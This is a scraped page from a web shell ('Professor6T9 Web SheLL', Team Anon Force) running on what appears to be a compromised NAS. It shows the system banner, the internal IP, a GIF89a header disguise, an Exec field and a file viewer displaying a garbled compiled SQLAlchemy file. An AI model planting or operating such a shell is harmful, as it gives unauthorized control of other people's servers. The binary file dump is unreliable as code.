GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
sqlalchemy
/
pool
/
__pycache__
[ HOME ]
Exec
Submit
File Name : dbapi_proxy.cpython-38.pyc
U �}�h� � @ s\ d Z ddlmZ ddlmZ ddlmZ i Ze�dd�dd � �Zd d� Z G dd � d e �ZdS )z�DBAPI proxy utility. Provides transparent connection pooling on top of a Python DBAPI. This is legacy SQLAlchemy functionality that is not typically used today. � )� QueuePool� )�util)� threadingz1.3zYThe :func:`.pool.manage` function is deprecated, and will be removed in a future release.c K s8 z t | W S tk r2 t �| t| f|�� Y S X dS )aH Return a proxy for a DB-API module that automatically pools connections. Given a DB-API 2.0 module and pool management parameters, returns a proxy for the module that will automatically pool connections, creating new connection pools for each distinct set of connection arguments sent to the decorated module's connect() function. :param module: a DB-API 2.0 database module :param poolclass: the class used by the pool module to provide pooling. Defaults to :class:`.QueuePool`. :param \**params: will be passed through to *poolclass* N)�proxies�KeyError� setdefault�_DBProxy)�module�params� r �B/tmp/pip-target-hu2ovxdm/lib/python/sqlalchemy/pool/dbapi_proxy.py�manage s r c C s"